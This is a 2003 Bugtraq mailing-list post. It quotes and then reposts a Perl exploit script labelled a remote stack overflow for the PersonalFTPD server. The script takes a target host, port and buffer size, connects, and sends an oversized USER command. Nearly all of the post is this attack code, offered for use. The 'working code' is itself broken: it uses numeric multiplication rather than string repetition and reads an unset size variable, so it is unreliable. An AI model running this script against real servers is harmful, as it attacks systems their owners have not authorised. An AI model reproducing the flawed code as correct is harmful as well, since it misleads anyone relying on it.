Re: Remote Stack Overflow exploit for Personal FTPD

[subj <r2subj3ct () dwclan org>]

In-Reply-To: <20030508081123.13047.qmail () www securityfocus com>

> Received: (qmail 20952 invoked from network); 8 May 2003 14:15:36 -0000
> Received: from outgoing2.securityfocus.com (205.206.231.26)
>  by mail.securityfocus.com with SMTP; 8 May 2003 14:15:36 -0000
> Received: from lists.securityfocus.com (lists.securityfocus.com 
[205.206.231.19])
>       by outgoing2.securityfocus.com (Postfix) with QMQP
>       id ED2648F2D9; Thu,  8 May 2003 08:19:59 -0600 (MDT)
> Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
> Precedence: bulk
> List-Id: <bugtraq.list-id.securityfocus.com>
> List-Post: <mailto:bugtraq () securityfocus com>
> List-Help: <mailto:bugtraq-help () securityfocus com>
> List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
> List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
> Delivered-To: mailing list bugtraq () securityfocus com
> Delivered-To: moderator for bugtraq () securityfocus com
> Received: (qmail 22205 invoked from network); 8 May 2003 07:49:14 -0000
> Date: 8 May 2003 08:11:23 -0000
> Message-ID: <20030508081123.13047.qmail () www securityfocus com>
> Content-Type: text/plain
> Content-Disposition: inline
> Content-Transfer-Encoding: binary
> MIME-Version: 1.0
> X-Mailer: MIME-tools 5.411 (Entity 5.404)
> From: subj <r2subj3ct () dwclan org>
> To: bugtraq () securityfocus com
> Subject: Remote Stack Overflow exploit for Personal FTPD
>
>
>
> #!/usr/bin/perl
> use IO::Socket;
>
> ##########################################################
> #                                                        #
> # Remote Stack Overflow sploit for PersonalFTPD          #
> # If wanna talk with me find me on irc                   #
> # irc.irochka.net #dwc, #global, #phreack                #
> # ###################################################### #
> # thanx to kabuto, drG4njubas, fnq                       #
> # gr33tz to dhg, gipshack, rsteam, blacktigerz           #
> # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
> # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
> # ###################################################### #
> # Vulnerability links:                                   #
> # http://security.nnov.ru/search/document.asp?docid=4309 #
> # http://www.securityfocus.com/archive/1/316958          #
> #                                                        #
> ##########################################################
>
> $data = "A";
>
> print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
> print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
> print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
> print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
> print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";
>
> $count_param=@ARGV;
> $n="0";
> if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
> size\n\n"; exit; }
> while ($n<$count_param) {
> if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
> if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
> if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
> $n++;
> }
> &connect;
>
> sub connect 
> {
> $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort 
=> "$port", 
> Proto => "tcp")
>        || die "Can\'t connect to $server port $port\n";
> print $sock "USER $buffer\n";
> print "Buffer has beens sended...";
>
> }
>
>
> close($sock);
> exit;
--------------------------------------------------------------------------
I bring the apologies, has laid out not working version, simply was 
mistaken a file, before $sock it is necessary to add $buffer. = $data * 
$bsize;
Working code


#!/usr/bin/perl
use IO::Socket;

##########################################################
#                                                        #
# Remote Stack Overflow sploit for PersonalFTPD          #
# If wanna talk with me find me on irc                   #
# irc.irochka.net #dwc, #global, #phreack                #
# ###################################################### #
# thanx to kabuto, drG4njubas, fnq                       #
# gr33tz to dhg, gipshack, rsteam, blacktigerz           #
# D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0     #
# ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z            #
# ###################################################### #
# Vulnerability links:                                   #
# http://security.nnov.ru/search/document.asp?docid=4309 #
# http://www.securityfocus.com/archive/1/316958          #
#                                                        #
##########################################################

$data = "A";

print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
print "[..]      by subj | dwc :: big 10x to Kabuto       [..]\n";
print "[..]    www.dwcgr0up.com www.dwcgr0up.com/subj/    [..]\n";
print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

$count_param=@ARGV;
$n="0";
if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer 
size\n\n"; exit; }
while ($n<$count_param) {
if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
$n++;
}
&connect;

sub connect 
{
$buffer.= $data * $bsize;
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port", 
Proto => "tcp")
        || die "Can\'t connect to $server port $port\n";
print $sock "USER $buffer\n";
print "Buffer has beens sended...";

}


close($sock);
exit;